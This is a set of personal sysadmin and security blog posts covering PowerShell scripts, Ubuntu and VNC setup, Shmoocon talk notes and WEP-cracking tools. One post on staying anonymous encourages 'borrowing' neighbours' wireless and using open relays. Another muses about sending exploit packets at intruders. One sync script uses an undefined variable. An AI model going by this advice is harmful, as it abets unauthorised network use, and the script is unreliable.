Anyway, yes, my next project is to start standing up and getting more familiar with running certain apps on Linux. SSH is not going to be an issue, and I'd like to leverage Linux to analyze my Apache log files and other neat things on my network. On a more advanced note, I want to throw sendmail or another nix mail server up as well. I like my current mail server, but the image spam is just not terribly fun and spam solutions on Windows are not as impressive to me as nix solutions. Besides, I want to be exposed to more. I spent years in my comfort zone and it's paying off to try out new things. This box also now had a 200GB HD and has always had 2 NICs which plays right into my hands to get Snort on a nix box and familiarize myself with some more monitoring tools.

That's how my spring is shaping up, and what has been stealing my time lately.

Snagged this from Sean's blog. I swear I have seen this before or maybe even posted about it, but couldn't find it. Either way, it's a nice set of "laws" and in the same vein as the 10 immutable laws of security.

Law #1: Nobody believes anything bad can happen to them, until it does
Law #2: Security only works if the secure way also happens to be the easy way
Law #3: If you don't keep up with security fixes, your network won't be yours for long
Law #4: It doesn't do much good to install security fixes on a computer that was never secured to begin with
Law #5: Eternal vigilance is the price of security
Law #6: There really is someone out there trying to guess your passwords
Law #7: The most secure network is a well-administered one
Law #8: The difficulty of defending a network is directly proportional to its complexity
Law #9: Security isn't about risk avoidance; it's about risk management
Law #10: Technology is not a panacea

There is some interesting talk going on about mesh security over on Nate Lawson's blog. Really cool stuff, although I don't understand it quite well enough yet to regurgitate the topic on here, so just check out the link. Also, Matasano and Bejtlich have added to the discussion.

Dave Aitel posted to DD a link to a review of SILICA. SILICA is awesome and one of those gadgets I really want to get my hands on. But at a price of $3600, it is definitely a major purchase for someone like me; just low enough to be doable, but higher than even a good laptop or gaming rig with a far fewer uses. Nonethless, if this device stays current and highly supported by Immunity for many ongoing years, I really am going to plan on picking this up in the next year or just after (my car gets paid off next summer which means some freed up monies...).

From an article:

About 11 buildings have lost air conditioning because of the failure, Stone said. The problem threatens to overheat computer servers, and officials are warning that the state's main web page will be out of service periodically throughout the day.

It is hard to realize how important cooling is in a data center or even a small switch room until the AC cooling said room goes out. It can heat up pretty fast if you're not decisive and that can really cripple business.

How do you plan for such an event?

- Make sure you have redundant cooling solutions; while you might not need multiple heavy industry coolers, at least have something available to either vet warm air or introduce cool air. While normal fans are absolutely no replacement to AC cooling, moving air is better than stagnating warm air.

- Keep AC repair service numbers or contracts readily available for quick remediation.

- In your inventory of servers and systems and services, make sure you know which ones are critical and which ones are expendable over short periods of time. Just like trying to milk juice out of your UPS in a power outage, you want to milk the temperature in your server room as long as possible. Shut down all unnecessary servers and devices to minimize heat generation. Be ready to determine when critical temps are reached that will almost certainly damage equipment and/or data and be prepared to invoke a business continuity plan or...be ready to have the company take the day off...

PowerShell is pretty cool so far, even if the remote capability requires some heavy scripting/.NET experience for now. I just found out today that I can actually write functions, put them into my profile file (%My Documents%\WindowsPowerShell\Microsoft.PowerShell_Profile.ps1), and have them load on start-up. This means my little function to start and stop remote services can be a simple one-line job and always preloaded, kinda like my own little command shell. Type $profile to make sure you have the right location. Mine is weird since I start mine with network admin privs as opposed to my normal workstation account.

Windows PowerShell
Copyright (C) 2006 Microsoft Corporation. All rights reserved.

RemoteServices loaded

PS C:\Documents and Settings\mdickey> remoteservices
usage: RemoteServices [servername] [Stop|Start|Check|List|GetName] [service name]

OmniNerd posted a rather lengthy article comparing various default installations of most modern operating systems (released in 2006, I think) using nmap and nessus to determine the vulnerability of said distributions to remote attacks. While simplistic in assessment and lengthy in discourse, the biggest takeaway I got from this article in my brief skim aligns with what I believe anyway. Operating systems have weaknesses, strengths, and problems, but ultimately it is a knowledgeable and diligent admin that makes a system secure (or more secure, if you will), and normal users can turn an OS into swiss cheese very easily.

If you have time to check this out or you don't and still want to learn something (shame on you!) then pick up Applied Sec's Shmoocon challenge notes and the solutions. I don't think they'll be up for a terribly long time, especially the server, so don't delay. Upon first glance, these challenges look to be a little more varied and interesting than most of the web-based "hacker challenge" sites out there.

I almost bought a Linux-based PDA earlier this year (Zaurus 5500 or 6000) and I still might, but after reading what is now available for Windows Mobile from both Justin Clark and Andre Gironda, I might have to add a newer Windows Mobile device for myself this year. I hadn't realized tools had come this far! There are more notes here and likely elsewhere if I were to look.

If you're a sec geek, you're also likely a gaming geek on some level. And if you do any amount of PC gaming, you'll likely be building your own systems unless you have extra money to throw at pre-built systems from vendors. And while I'm not in the market to fully upgrade my gaming rig right now, it really helps to casually read up and stay at least somewhat current with what is going on in the PC building gaming market. This article by Corsair is not just a guide to buying bargain gaming parts that still scream performance, but they guys actually go through (with lots of awesome screenshots) overclocking, BIOS settings, benchmarking tools and examples, and even suggestions on different parts. (Personally, I'd swap that frickin' huge heatsink with a watercooling model.)

In true HardOCP fashion, you can also head to the comments of their news byte on the article and check out some reactions.

On third thought, it wouldn't hurt to maybe pick up a few parts now and file this guide away...

WEP is already known to be broken and weak, but I see Aircrack-ptw is a new tool out that purports to break WEP (most implementations anyway) much quicker. I have not yet tried it, because BackTrack 2 decided to be a bugger about my Hermes Orinoco card and I have yet to replace it or find a solution (Whoppix and BT1 are fine with it, go figure), but once I get that squared away I plan to check this tool out. There is a paper linked on the site, and while some of it gets into some deeper mathematical (mathematical sure sounds more haughty than "math," eh?) theory, some sections are still concise and informative (1, 5, 8, and 9).

Update: I see ISC has also been made aware of this, although they link just to the paper.

For any practicing sysadmin, sometimes you just have to tweak servers to milk a little bit more performance. Sometimes the good ol' basics are still the best things to do. I liked these steps (mostly) from SearchWinComputing. I'll just give my own notes on the steps.

1. Use a dedicated drive for the pagefile. This makes sense.

2. Keep your hard disks defragmented. I don't do this much, but when trying to milk a bit more performance out of a server, defragging is still a low-hanging fruit to try out.

3. Use the NTFS file system. I wouldn't think to do otherwise, not from a performance standpoint necessarily, but definitely for security.

4. Avoid running 16-bit applications. Ok.

5. Look for memory leaks. Basically need to continuously monitor memory usage to catch this. Sometime apps (like ASP) will automatically recycle themselves and clean up, thus lowering the indications of a memory leak. Once a process is identified that has a leak, research it on Google or with your own teams if it is homegrown.

6. Remove seldom-used utilities. I would also suggest making sure server software is inventoried and reviewed regularly. That way when some piece is no longer needed, it can be identified and removed. But yes, it sucks to see unused things running on a server.

7. Disable unused services. A tried-and-true best practice for...just about everything.

8. Log off. Makes sense to me!

9. Compress the hard disk. The author makes a decent case for this, but I would definitely only do this in conjunction with baselining performance and testing after each change otherwise this could be detrimental.

10. Adjust the server response. i.e. Adjust background applications for a higher priority.

I am scripting some file syncing and having a frustrating time. The biggest issue is trying to work around a few files that are flagged as "read-only." In the examples, assume sourcefile.txt is "read-only."

PS> copy-item sourcefile.txt c:\sourcefile.txt -force
If this is the first time copying, this will work just fine because the destination file is new.
PS> copy-item sourcefile.txt c:\sourcefile.txt -force
This will now give an error because c:\sourcefile.txt is read only.
PS> move-item sourcefile.txt c:\sourcefile.txt -force
This will always work.

While this isn't so bad, I don't want to move folders over without first going through them to make sure the new folder isn't leaving out something from the old folders, if that makes sense.

So far, my solution is way more complex than I think it should be. I read through all folders and determine if the folder is new or already exists at the destination. If it is new, I move-item it over. I then copy all non-containers that are left. Then I remove all the leftover source containers. Please excuse the variable names and lack of tabs showing up.

$shortpathdest = "\\SERVER\FILES\Installed"
$shortpathsource = "\\SERVER\FILES\ToInstall"
$items = get-childitem $shortpathsource -recurse | where  {$_.psIscontainer -eq $true}

If ($items)
   {
      foreach ($i in $items)
         {
            $fullsourcepath = $i.FullName
            $fullsourcepath = $fullsourcepath.Replace($shortpathsource,"")
            $fullpathdest = $shortpathdest + $fullsourcepath
			
            If (test-path $fullpathdest){ }
            Else { move-item $($i.FullName) $longpathdest -force}
         }
   }

$items2 = get-childitem $shortpathsource -recurse | where  {$_.psIscontainer -eq $false}

If ($items2)
   {
      foreach ($i in $items2)
         {
            $fullsourcepath = $i.FullName
            $fullsourcepath = $fullsourcepath.Replace($shortpathsource,"")
            $fullpathdest = $shortpathdest + $fullsourcepath
            move-item $($i.FullName) $fullpathdest -force
         }
   }

Remove-item $shortpathsource\* -recurse -force

Some of the Shmoocon 2007 presentations have been posted. There's a few, and maybe not all of them will be interesting, so I thought I would provide my feedback here (and ongoing) on the talks I checked out, plus a quick impression of what I thought about it.

I really wish I had attended Shmoocon, but I'm not really at a place right now where I could. I really wish I had heard about it back in its first year, 2005, as I was in DC at the time on business. Sadly, I didn't learn about Shmoocon until after I had gotten back (and I was housed in a hotel very close to it as well!). At any rate, I'll still whore up the presentations online and still get something out of it. Overall, I really dig the vibe from Shmoocon. It is serious about security but in a fun, friendly, personal kind of way that I think best resembles early Defcon or perhaps CCC. Smart, awesome, but not hoighty and "commercialized" or too anonymous.

Opening Remarks.mp4 - If you want to learn a little bit more about Shmoocon and what it's all about, this is a useful talk from Bruce Potter of the Shmoo Group and runs a half hour.

Hacking the Airwaves with FPGAs - h1kari.mp4 - 20 minute presentation about cracking WEP and WPA (and FileVault and Bluetooth PINs) using different hardware pieces (FPGA) to speed things up. While that is interesting, the hardware itself is pretty spendy. If you've not seen his talk before or know anything about FPGA, watching a longer presentation may be more helpful, but his demos are quick and do work in this one. Tools: jc-wepcrack for WEP, coWPAtty for WPA, vfcrack for FileVault, btcrack for Bluetooth PINs.

No-Tech Hacking - Johnny Long - Johnny is a very cool presence and typically includes a lot of really awesome audience participation where he presents pictures and asks for feedback. This is no different and he presents a lot of pictures and asks, "What does a hacker see?" This is about observation skills, information gathering, opening your mind. I can just also say, "the driver has candy."

More Shmoocon 2007 presentations.

Hacker Potpourri - Simple Nomad.mp4 - Simple Nomad (old skewl) talks about some greylisting of spam mail, OS fingerprinting using PPTP, finding firewalling devices (using FIN flags, UDP port 0 packets, hop counting) and DVR hacking, but the real meat of this talk is about profiling IDS/IPS systems which starts at 32:45. You can use reverse-lookups to profile some IDS/IPS systems, the timing of reports, and whether admins are doing manual checks. Can fiddle with the DNS replies to profile the investigator some more. Abuse the signature sets to further narrow what IDS is in use or how they block things (vulnerability vs exploit). You can really do a lot of information gathering by knowing signatures for various IDS products and doing tests to see if your attacks are either blocked, allowed, or logged and then either manually or automatically investigated. Very cool.

Extend Your Code Into the Real World - Ryan Clarke.mp4 - I really dig Clarke's enthusiasm and energy. I'd love to hang out with this guy and tinker with electronics and hardware on the weekends. His talk is a beginner blitz into hardware hacking. I consider this talk mandatory for any security or tech guys as Clarke really shows off where some things are going. Very exciting!

When it comes to computers and "hacking" and electronics, I can't do everything despite my desires and best efforts, but for the things I'm not diving into at the time, I love talks like this because they can give me a nice taste of what I'm missing and keep me at a level that I could dive in if my life ever finds me in a place where I can do it (or have friends who do it that I can learn from).

The latest 2600 is out. If you don't typically buy it or have the money, just sit down at the bookstore and flip through it and read what you want.

I also see one of the books I've really wanted in the last year has been released. Hacking Exposed: Wireless is currently available and in an odd green color. Anyone aware why this one is green? I didn't pick it up long enough to find out why, but I'll be buying the book regardless.

On the wireless front, I got my latest Orinoco wireless PCMCIA card on Friday and am very pleased with its performance. It is the Atheros chipset (8470-WD) which means it plays very nicely with BackTrack 2 and monitor mode. In fact, it plugs in and works just fine unless I've been juggling cards on that laptop and the last config still has a different card (my BackTrack is fully installed locally, so my settings are saved).

So, a while back I got a Wi-Spy, which works great on Windows XP. I saw that there are some wispy tools for Linux, so I thought I would try them out on my Ubuntu laptop. I downloaded the files and extracted to /home/michael/wispy.

michael@orion:/$ cd /home/michael/wispy
michael@orion:~/wispy$ sudo apt-get install libusb-dev libncurses5-dev libgtk2.0-dev
michael@orion:~/wispy$ ./configure
michael@orion:~/wispy$ make
michael@orion:~/wispy$ sudo ./wispy_gtk

This worked out just fine (and yes, libgtk2.0-dev installed a ton of stuff), but the colors look horrid. The whole spectromap takes on this lemony-green color even when nothing much is happening. Very ugly, but then again, this is just a quick set of tools whipped together and really is no replacement for using Chanalyzer on Windows. Still, this is nice in case I ever do want to see what's going on and only have my Ubuntu with me.

I saw this quote today in some news that hit my rhetorical question button:

The Ministry of National Defense located in Taipei has warned their personnel against cyber attack. Awareness at the user level is more important than ever after a recent discovery of an intelligence leak at the National Defense University.

What would you do differently in your job if you received a warning from your boss or from upper management or the security team to be wary of cyberattacks? What will your own employees do differently? Will they even know what that means or what to even begin to do?

I can imagine my mom getting that notice where she works and basically have zero change in behavior because it really means nothing to her (works in a hospital). Should she stop more strangers in the hallways and challenge for ID? Should she refrain from email communication? If the computer crashes unexpectedly, should she more quickly call up IT to report it and investigate?

Does your security training equip employees to be able to process and respond to such a warning? Maybe the company shouldn't even give these warnings and instead only raise the warning level of technical/security staff? Did you send out a warning to employees the other week to be on the lookout for any ANI/cursor files sent via email or posted on websites? Does that really change anyone's behavior or do they just talk to their immediate peers about how stupid that email was for 5 minutes?

Auditing permissions on a Windows server is basically hellish unless you have a very strict policy on subfolder explicit permissions and group usage. You can use tools like CACLS.exe and XCACLS.exe, but for messy folder shares, the output can be utterly unmanageable. Enter a powershell script I wrote. This script take a path as an argument and will dump out all explicit (non-inherited) permissions from the path and all subfolders inside it. Never make the mistake of re-pushing inheritance down on subfolders and wiping out all those restrictions again!

$error.clear()
$erroractionpreference = "SilentlyContinue"

function GetExplicits ($folders)
{
   foreach ($i in $folders)
   {
   $acllist = get-acl $i.fullname 
   foreach ($x in $acllist.Access)
      {
      If ($x.IsInherited -eq $false)
         {
         Write-Host "$($x.IdentityReference.Value) has $($x.FileSystemRights) on $($i.fullname)"
         $spacing = $true
         }	
      }
   If ($spacing){ Write-Host "";$spacing=$null }
   }
}

If ($args[0]) { } Else {"usage: ./auditperms.ps1 `"`"";break}
$strpath = $args[0]
If (test-path $strpath){ } Else { "bad path, try again, cowboy!";break }

Write-Host "----------------------------------`nROOT FOLDER EXPLICITS"
$folderslist = Get-Item -path $strpath
GetExplicits $folderslist

Write-Host "----------------------------------`nSUBFOLDER EXPLICITS"
$folderslist = Get-ChildItem -path $strpath -recurse | where  {$_.psIscontainer -eq $true}
GetExplicits $folderslist

The output looks like this:

----------------------------------
ROOT FOLDER EXPLICITS
Everyone has Modify, Synchronize on \\fileserver\users\scanner
CREATOR OWNER has Modify, Synchronize on \\fileserver\users\scanner
BUILTIN\Administrators has Modify, Synchronize on \\fileserver\users\scanner
MYDOMAIN\Domain Users has Modify, Synchronize on \\fileserver\users\scanner
----------------------------------
SUBFOLDER EXPLICITS
Everyone has ReadAndExecute, Synchronize on \\fileserver\users\scanner\FarmBanc

Everyone has ReadAndExecute, Synchronize on \\fileserver\users\scanner\SalesApp

Everyone has ReadAndExecute, Synchronize on \\fileserver\users\scanner\SalesApp\April Visit

I see there is a vulnerability in aircrack-ng 0.7. While interesting in itself, this strikes an interesting chord.

First, this means that widespread, fairly static distributions such as BackTrack 2 have a lot of users of their Linux livecd that will continue to run vulnerable versions of aircrack-ng. That's a bit of concern, or should be, for anyone who uses that distro. Granted, the chances of someone attacking their box with this vuln is downright slim, but unless you roll your own BackTrack, do a full local install to update aircrack-ng, or patch aircrack-ng on the fly, you're kinda stuck with this issue.

Second, I really believe someday I will have enough time on my hands to have a more bristly defense posture on my networks. In this case, I could have not only an IDS on my wireless network, but I could actually regularly send out packets crafted for just this vulnerability. Anyone leveraging aircrack-ng 0.7 (or BackTrack2) against my wireless network might be in for a brief surprise and could give me additional information or warning about maldoers. Rather than just a fence around the grounds, it can be highly electrocuted as well.

With a lot of vulns like this, it might not make sense to send out traffic for it because you never know if people will still be using it, and the chance gets slimmer as time goes on. But BackTrack 2 is pretty static for a lot of users who never change anything and may be using this distro until a major update comes out.

This editorial on Dungeons & Dragons & Networks talks about how the boundaries present in both network troubleshooting and the D&D play format promote creativity, while tasks with less boundaries are more difficult.

If people performed preventative maintenance and worked to improve their network, they'd have fewer problems to address in the first place. But because individual problems provide intellectual boundaries and present obstacles to overcome, it is simply a much, much easier task than trying to look at the vast possibilities inherent in the network and try to come up with a vision rather than a solution.

I think there is a lot of truth in that, especially since us IT types tend to be problem-solvers a little more than we are visionaries. I think management (and IT staff ourselves!) can benefit from recognizing initiatives that might be more successful when more properly bounded. I am guessing that many managers and project managers likely know this principle already, but it can definitely help us techs when we're not being led very much in between fires. (Article found through WhiteDust)

Played briefly with OpenWRT this weekend. I have an extra Linksys WRT54G (v2.2) WAP and I loaded up the appropriate OpenWRT firmware. OpenWRT unexpectedly imported all my previous settings from the Linksys default firmware, so I didn't really have to do much besides plug in cables.

It should be noted that while Linksys products are administered by the web interface, OpenWRT's web interface is really only useful to see some status information, set very general settings, and view the list of installed and available packages. Everything else should be done via an SSH connection. Set the login password in the web interface while there. This not only sets the web interface password, but also turns off telnet and enables ssh. Remember that you are essentially SSHing into a Linux box, so you SSH as root (ssh root@192.168.20.1). Hopefully through the week I'll look into playing with this box a bit more.

Security and IT are tough these days. While we keep getting an influx of people with their MCSE and A+ certs that can do fun things with desktop support, it is all those other more specific areas of IT that still are not getting the love they should be getting. Maybe it is because they're a layer or two out of the eyes of most normal users (and managers). Too often, us techs can do a lot of good things, but sometimes don't get a chance to try things out when we're already swamped with an overload of work, not enough money, and too many fires to put out.

Mark Curphey has been posting his experiences with his new start-up lately. While a lot of the content is not terribly pertinent to me at this point, I do enjoy reading him. Tech-to-tech, this paragraph really caught my eye:

Did I really transfer the domain to my account or was this someone snarfing my domain and my religious spam rules means I missed a very important mail? Alex was sat at his desk dreaming in code but saw I was panicking. We look at it and pulled up the whois records. Holy bull-shitake batman, some bastardo has snarfed my domain and the records show dummy, dummy, dummy as the new owner. We googled and others had been conned by the same trick. How could this happen? How could Gandi let someone transfer a domain without positive acknowledgement. Oh cricky, I really screwed up by being strict on spam.

Considering the theme of this post, I think it might be obvious what caught my attention. You can make an entire job out of being a spam admin or even a DNS/SSL/domain admin, even at smaller companies. But chances are, those tasks are only a very small part (a disturbingly tiny) part of our jobs. How can you get to be a spam surgeon? Do you have time to pick through what gets caught in the filters? Do you have time to even tune up the filters at all while maintaining high functionality for possibly critical emails? Just how are you tracking all your DNS and SSL purchases and expirations?

That's tough, and I think unless you can acquire these skills somewhere or have a job that lets you have a lot of bandwidth to research and tinker with such things, outsourcing to a company that can focus on just that one thing is still a big IT need. That or understanding what techs need to ultimately be successful. Can you really maintain a spam filter effectively, or would it be more efficient to outsource to a company that specializes in spam filtering?

That is one area I think still needs work in the "business and IT must work better together" agenda. We don't know everything in IT and we really do have to make mistakes. I've learned that you learn the most about technology during the troubleshooting stage as opposed to when everything is going right. Business is not terribly forgiving about such things, even if they are small but visible incidents in the whole scheme of things. Business wants to make a request, have it implemented perfectly, and then run unattended for 25 years without any further investment. IT knows better and that any new technology not only must be learned, monitored, and administered, but at some point does need to be evaluated for security, efficiency, and proper improvement.

This is pretty low-skill, but useful. If you want to disable firefox from sending referer [sic] messages when you click links to other locations, type about:config and change the network.http.sendrefererHeader option to value 0.

I just read Naming Workstations on a Windows Network and had to smile a bit. Something as simple as your workstation naming scheme can be a very complex process that is different for every single network from 10 users to 10,000. It just goes to show how varied our field is and how many different ways and opinions there can be.

My current job names workstations by OS and username. I dislike this scheme. At my old job early on I inherited and used a similar method where I named the workstations after the usernames. We had a smaller company of only about 60 users, and by the time we grew up to 150, we had had a security audit which pointed out that machines named in such a way leaked too much information (Low priority, I believe). Wanted to target the CFO? Find his name, enumerate the network, and you likely also have a username that has rights on that machine.

I switched us over to naming machines "wkst###" and maintained both an Excel spreadsheet mapping workstation name to the user assigned that computer (we checked out equipment to all employees) and also inventory management software which let me regularly map MAC, IP, usernames, and workstation names together. This way if "WKST125" was doing something naughty, I could very quickly isolate it, take control, and/or check on the user. Having administrative access on switches and remote control capabilities takes away a lot of the need for user-named or even departmental-named workstations when you have an inventory of MACs and domain admin rights! I never did reuse names either, and I had a strict personal policy that no machine was re-issued without first wiping and re-imaging it (sadly, some colleagues did not adhere to such policy later on), thus a perfect opportunity to rename it. I might leave orphaned entries and artifacts this way, but I would rather have orphaned data than data that might actively be lying to me if it wasn't kept up to date.

Keystroke mechanics keep being talked about as a form of biometric identification. I'm still skeptical because of how variable this can be...

I live in Iowa which means we have some pretty cold winters. I certainly do type differently if I have cold fingers.

I also type vastly differently depending on my level of inebriation (of course, this can cause regular typos in passwords anyway...)

I type differently depending on my position and mood and keyboard and life. I type far differently now than I did 5 years ago, for instance. Sometimes I am in thought and might type differently, especially on some sort of password screen.

Do I think people type in differents ways enough to be able to tell who it is with an acceptable level of accuracy? Personally, I doubt it...

Richard's post about monitoring and "management by fact" got me thinking about security for the real world admin. What is the best sort of server to monitor? That's easy, the server that requires the least changes. If you stand up a server and don't need to do anything beyond patches and application-level updates (for a DNS server, adding DNS records...), monitoring that box becomes amazingly easy and informative.

You can quickly tell when something is wrong. Besides, typically in troubleshooting (and it is part of Cisco's troubleshooting methodology) is to ask pretty early on, "What changed?" This is something really near and dear to my heart, since I used to be pretty heavy into sciences back in college: observable changes causing observable results. If something weird happens, figure out what the one-off is that caused it.

There are really two problems in business that fight a never-ending battle against the unchanging server.

First, the technical ability of the admin is crucial. Take a new DNS admin tasked with standing up a DNS server. It might not take long to get the DNS server up and running, but to get it tuned for performance and security may take weeks, months, even years of small changes, mistakes, and troubleshooting. For an expert, experienced DNS admin, this "time to stable" is far shorter and much more ensured. This is partly why we need more experts (training) in the back rooms of IT, the luxury of making mistakes to become experts, and time to do proper research so we can be empowered to do more initiatives outside of our comfort zones (otherwise we just say, "no").

Second, business sometimes likes to cut corners, especially with money and especially with IT infrastructure. If a server isn't choking, it must have room to put more on it, right? This defeats trying to efficiently "manage by fact" in the IT back rooms. If you have an SBS box that does basically everything that can be crammed into it, the constant flux of use and changes can make creating a baseline and monitoring for oddities frustrating.

I love the idea of managing by fact, and I think for the most part of security, that should be the goal to someday reach.

Yeah, I know, back to basics with Ubuntu. This took me longer than it ever should have, so I'm just posting my travails here. I wanted to make my Ubuntu server essentially headless where I don't have a keyboard, mouse, or monitor hooked up to it. Obviously this means remote desktop capabilities.

Sadly, the obvious and most often-used tools to accomplish this either require me to remote logon with my Ubuntu laptop (yuck!) or require a session to already be logged on the server locally (yuck!). Well, I want to be able to remote in, even at the logon window after a reboot! Here are my steps.

sudo apt-get x11vnc vnc-common
sudo x11vnc -storepassword password /etc/x11vnc.pass
sudo gedit /etc/X11/gdm/Init/Default
add this at the bottom just above exit 0:
/usr/bin/x11vnc -rfbauth /etc/x11vnc.pass -o /tmp/x11vnc.log -forever -bg -rfbport 5900
sudo gedit /etc/X11/gdm/gdm.conf
change #KillInitClients=true to KillInitClients=false
reboot

I'll probably end up changing this all up once I decide to wrap this inside SSH, but since this will always be local (unless I VPN in remotely), I'm not as concerned about this setup. I might just tunnel it through SSH just to make sure I can do so with this setup.

I dig somafm, particularly the Groove Salad station. Sometimes I get into a nice chilled state of mind at night and would love to fall asleep to some cool grooves, but don't want XMMS (my mp3 player) to run all night long. Well, I can do this easily in a terminal shell by first finding the pid of XMMS and then using the sleep command. Elegance in simplicity.

michael@orion:~$ ps ax | grep xmms
29540 ?        SLl    0:20 /usr/bin/xmms /tmp/groovesalad.pls
30511 pts/0    R+     0:00 grep xmms
michael@orion:~$ sleep 1200; kill 29540

If stories like this keep appearing, IT is going to continue to become much more complicated...

Denison first attempted a remote attack against the ISO data centre on Sunday, but this was unsuccessful. He then reverted to simpler means, and entered the facility physically using his security card key late on Sunday night. Once inside, he smashed the glass plate covering an emergency power cut-off, shutting down much of the data centre through the early hours of Monday morning. This denied ISO access to the energy trading market, but didn't affect the transmission grid directly. Nor did his emailed bomb threat, delivered later on Monday, though it did lead to the ISO offices being evacuated and control passed to a different facility.

Looks like you can recreate images on LCD screens remotely. I'm not sure how it works with moving images, but this is pretty high-end if you ask me. It is interesting to hear that NATO spent a lot of money to protect against a similar attack against CRTs. And also RFIDs are still being talked about for their flaws and the paranoia behind them.

One of my big things is how our security, laws, and entire culture have changed due to how efficient the digital world has become. Music has always been pirated, only now it can be done on massive scales. In the past, things like RFID and LCD eavesdropping were really only issues for extremely high-end governments and corporations. No one else cared, had threats that had these capabilities, had the assets valuable enough to protect to justify the cost, nor had the money to afford it anyway. We're talking huge companies, governments, and military, and even just subsets of those.

But these days, things like this can become a reality for more people. RFID might be something we have in all our pets soon, cars, electronics, maybe even ourselves. LCD eavesdropping is still a bit exotic, but if it really is as easy as it seems, this could become a backroom concern for corporate espionage or even internal investigations. Can you imagine being assigned the task of sitting in a conference room and recording images on the screen of a VP two offices away as part of an internal investigation in addition to network and disk forensics? Could you maybe drop a magnetized object on the back of the monitor which automatically logs all the images much like a keylogger? What about the potential range of such eavesdropping? Can it be thwarted fully by focusing on the physical security angle or will LCDs be obsolete in 7 years just like CRTs are now, thus the vulnerability will slowly ebb away?

Some interesting thoughts...

Adnan posted about a Rootprompt post pointing to this Ubuntu server installation tutorial on Feisty Fawn. The tutorial is aimed at installing services that an ISP would need: SSH, BIND, MySQL, SMTP-AUTH/TLS, Courier-IMAP/POP3, Apache/PHP5, ProFTPD, ISPConfig. Not necessarily stuff I all need, but some I do like to read up on how other people do these.

I like this tutorial and I don't like this tutorial. For starters, the tutorial is one of those things that says, "To install XYZ, run this command and move on." It really offers little ability to deeply understand what you're doing and what nuances your particular needs or security posture might dictate. When you install the SSH server, did you disallow remote root login? When you're done with this tutorial, do you set su/sudo behavior back to the default? Does MySQL or Apache run on its own account and can those accounts be logged into via SSH? The tutorial is great as an example of how easy it can be to install these services, but does nothing to warn users about the level of care and attention might be needed to make sure it is running securely and efficiently. Did you follow this tut and leave your balls out on the Internet to be tickled and kicked or did you slip a cup on when no one was looking?

However, I do like tuts like this where sometimes the service you want to install seems daunting for no real reason other than fear of the unknown. I've worked with BIND in the past and can edit my own zone files, but for some reason I have never actually stood up a BIND DNS server myself. Tuts like this can blitz you through the unknown and get you going. You can't learn to whitewater raft by watching from the bluffs. Get the hell in the water, capsize yourself, and get wet!

I had a post a few days ago about managing by fact, to which Alex responded rather appropriately by saying "fact" is a bit of a strong and strict word. We can manage by belief, but our beliefs need to be backed by observable evidence, reason, and facts (yes, I'm rewording). He's right and I have a belief that we both agree on this topic quite nicely. :)

So you want to interact with the less "white hat" types of security professionals but you don't want to hang your balls out there and allow people to track back to you? Looking to not put your name which might be attached to your company into the limelight if you just happen to get noticed and on the wrong side of some punk kid who decides to have some fun at the possible expense of your career? Or you are just a rightfully paranoid security guy looking to rub shoulders and learn new things without the possible collateral damage of having to defend your own network at home? Well, here are some tips on staying anonymous online.

For this series of posts, I will try not to get fancy and technically challenging. I know you can leverage even better means of anonymity online by routing through SSH connections and shells, scrubbing packets and information, "borrowing" other computers in disparate parts of the world and using them to bounce your connections, or fancy P2P nets and encryption. Some of that is just not as practical for quick approaches. Of note, not all of the stuff mentioned here is technically legal, although the illegality may still be pretty grey. Open mail relays, web proxies, and nearby wireless networks may not necessarily be freely open, so just be aware of that.

Keep in mind that this guide is not meant to protect you if you want to do illegal and bad things. This guide is meant for non-criminals to add an extra layer or two of protection between yourself and other nosy persons. If you already live in the darker corners of the Internet, this guide will not give you any additional information. I also am not entirely encouraging people to push the lines of legality with some of these ideas and steps. Common sense is your friend.

This series is not meant to protect your identity from credit card thieves or allow you to live out your life in places the IRS cannot find you. This is not about hiding your search queries in Google because you think they and the DHS are tracking you. This is simply about being anonymous on the Internet in regards to how other people find or interact with you and you with them.

I'll start off with some ground rules.

First, don't be stupid and immature and pick fights. What some newbies do in communities is pick fights and/or act stupid in an effort to quickly get noticed. This is not the way to go. If you have something useful and novel to offer the community, go for it. But most people new to these communities are better served by sitting back and offering tidbits and discussion as they have an opportunity to do so. Be positive, supportive, friendly, and outgoing when it appears to be welcomed. Learn the tone, the names, and what goes on. That's really the biggest bit of advice for interacting in a community outside the white hats and office cubicles: don't be a dumbass. And if someone pounces on you trying to be a pest, just let it slide. This isn't prison where you need to offer a beatdown to the first person who challenges you or forever be branded easy pickings.

Second, pick a nickname (screename, handle, nick...). If you want to maintain a distance between yourself and the community (which is sometimes prudent considering the curious nature of many crackers), you definitely need to not be known by your real name. Pick a nickname and stick to it. Better yet, pick a fully fake name. I go by Michael Dickey pretty much everywhere in life. But what if I picked Wally Harrison as my name online? I could hide in the noise of Google searches for other people. If you pick something really unique, you'll be a bit more easily searchable and one slip-up could ruin all of this work. Of course, don't pick a name that someone else is already using. Using StankDawg might not be kosher with StankDawg.

Third, be aware that staying anonymous is a heck of a lot of work. It is not easy. The more you want to be involved and known, the more you will leak information and screw up. True, full anonymity is not easy at all; in fact, I couldn't do it, myself. And if you want to make a go of it, be prepared for hard work, lots of time spent troubleshooting your own tactics, and prepare for your failures and slip-ups. True anonymity might not mean making absolutely zero mistakes, but it should be your goal to never show up in any logs with data that might be tied to you. Be aware of your information.

As a general rule, don't communicate or browse from home as much as is convenient to you. If you have nearby hotspots and open wireless, use them. If a neighbor has wireless, "borrow" their connection if you are feeling too paranoid (I didn't encourage that...right?).

Lastly, as part of this series of posts (a first for me), I encourage feedback, both in the form of suggestions, corrections, or even challenges saying my advice is crap. And even if you aren't looking to be anonymous, at least be aware of the ways some of your own users might be trying to stay anonymous.

Andy ITGuy is a proponent of training, which is awesome and wholly commendable. I totally understand that, but I'm feeling picky today. Maybe today is Picky Wednesday, I dunno. But I noticed Andy posted this (he's going to love that I'm pulling out an anecdote and unfairly focusing on it, hehe) and I want to make a point too.

My favorite quote from the post is this,

"My dear friend, education is the key..not more locks and bolts."

The same holds true for Information Security. If our users don't know how to spot and handle phishers then we might as well just put up an open WI-FI to our network and post it in the paper.

I'm not sure I would say that user education is key and that without it we may as well put up open wifi. I think user education is very important, but it won't solve IT security any more than education has solved drug use, teen pregnancy, or STDs. I won't be able to dispense with logging utilities or AV or LUA or spam scrubbing just because I have a good training regimen.

So yes, that's my point for the day. Security by technology and security by education need to be balanced just as much as security is balanced against usability. In the end, however, I'll take slightly more technology than education only because that is the one that can be auditable and has hard-drawn lines that I can trust (that and I likely have more budget right now than Andy might have...and that does matter).

